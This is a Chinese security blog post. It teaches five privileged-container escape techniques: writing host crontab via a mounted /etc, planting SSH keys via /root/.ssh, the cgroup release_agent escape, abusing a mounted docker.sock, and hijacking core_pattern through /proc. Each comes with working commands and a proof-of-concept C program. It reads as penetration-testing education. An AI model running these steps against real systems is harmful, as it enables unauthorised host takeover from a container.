五种方式教你用特权容器逃逸

Delina

原文链接：五种方式教你用特权容器逃逸
​
前言
随着容器被广泛的使用，容器安全问题也越来越受重视，容器逃逸便是其中一项。容器逃逸可以理解为当攻击者通过某种手段获取到容器内权限后利用某些条件来创造条件，以获得容器所在宿主机的权限，也可以说是提权了。这次简单说几个个特权容器的逃逸手法。
正文

关于特权容器的逃逸相对来说比较容易一些，毕竟它自身已经被赋予了最大的权限。一般可能第一点想到的就是挂载主机的/etc目录来写定时任务或者是挂载/root/.ssh写ssh密钥。
方式一：挂载/etc逃逸
因为/etc目录中包含crontab的配置文件，此文件目录为/etc/crontab。挂载了宿主机的/etc到容器内，在容器内修改crontab文件，宿主机上的crontab文件也同样会修改。话不多说，直接上图。

​

​

​

方式二：挂载/root逃逸
挂载了/root/.ssh目录到容器内，可以通过此方式逃逸。

•         生成本机的ssh私钥和公钥，命令：ssh-keygen -t rsa
•         把本机的公钥复制到容器内的/root/.ssh/authorized_keys里，可以实现宿主机的免密登陆。
  

​

将公钥复制至authorized_keys中

​

容器内直接使用私钥登陆宿主机，如图登陆成功

​

这两种方法简单粗暴，但是极容易被检测到，从而暴露。
方式三：挂载cgroup逃逸
首先启动一个容器
docker run --rm -it --privileged ubuntu bash在容器里执行命令,将cgroup直接以 cgroup类型挂载到容器内，挂载选项为 rdma（远程直接内存访问）并在容器内创建一个子cgroup目录（cgroup_2）,目的是为了创建release_agent文件且触发release_agent执行的cgroup。

1. mkdir /tmp/cgroup
   
2. mount -t cgroup -o rdma cgroup /tmp/cgroup
   
3. mkdir /tmp/cgroup/cgroup_2

复制代码

激活子cgroup的notify_on_release，使得在子cgroup退出时能够执行其父cgroup中的release_agent,当将 notify_on_release被设置为1时，在子cgroup被移除时，内核将会运行顶层cgroup下的release_agent文件中指定的命令。
echo 1 > /tmp/cgroup/cgroup_2/notify_on_release通过读取/etc/mtab获取uppdir= 后面跟随的路径（宿主机访问容器的路径）,并将其并写入 release_agent（如下图所示），宿主机可通过该路径访问容器根目录，cgroup最后一个程序退出时执行/cmd的脚本。

1. host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
   
2. echo "$host_path/cmd" > /tmp/cgroup/release_agent

复制代码

​
接下来就是构造cmd脚本，并将结果输出到容器内output下

1. echo '#!/bin/sh' > /cmd
   
2. echo "ps ef > $host_path/output" >> /cmd
   
3. chmod a+x /cmd

复制代码

​
通过子cgroup创建一个可以立即结束的进程，实施攻击,如图，成功获得主机ps结果sh -c "echo \$\$ > /tmp/cgroup/cgroup_2/cgroup.procs"

​

方式四：挂载docker.sock实现逃逸
当宿主机的docker.sock被挂载到容器内时，此容器可以通过docker.sock控制宿主机创建任意配置容器和控制正在运行的容器
docker -H unix:///hack/docker.sock info  #通过此命令可以查看docker信息

​

docker -H unix:///hack/docker.sock run -it  --rm -v /:/test --name=docker_sock_taoyi2 centos  /bin/bash  #通过docker创建一个挂载宿主机根目录的容器创建成功。
方式五：挂载/proc目录实现逃逸

​

1、与cgroup相同，通过读取/etc/mtab获取uppdir= 后面跟随的路径。
sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab​
2、此时容器内的 /exp.sh 对应宿主机/var/lib/docker/overlay2/5aad6c46857541101a54c64b8e92ac8495e4eecb6bbd6a76e24a0335be8d2d92/diff/exp.sh 文件。
​
​
3、挂载之后的文件，相当于共享。容器内外修改都会对应产生变化

1. echo -e "|/var/lib/docker/overlay2/5aad6c46857541101a54c64b8e92ac8495e4eecb6bbd6a76e24a0335be8d2d92/diff/exp.sh \rcore " > /host_proc/sys/kernel/core_pattern

复制代码

​
4、容器内触发segmentation fault

1. #include <stdio.h>
   
2. 
   
3. int main(void){
   
4. int *a = NULL;
   
5. *a = 1;
   
6. return 0;
   
7. }

复制代码

5、执行
./a.out

​

​

总结
由于篇幅有限，此次只介绍了五种常见的特权容器逃逸思路。除此之外，特权容器或是容器逃逸的方式还有很多种，后续再一 一详述。
​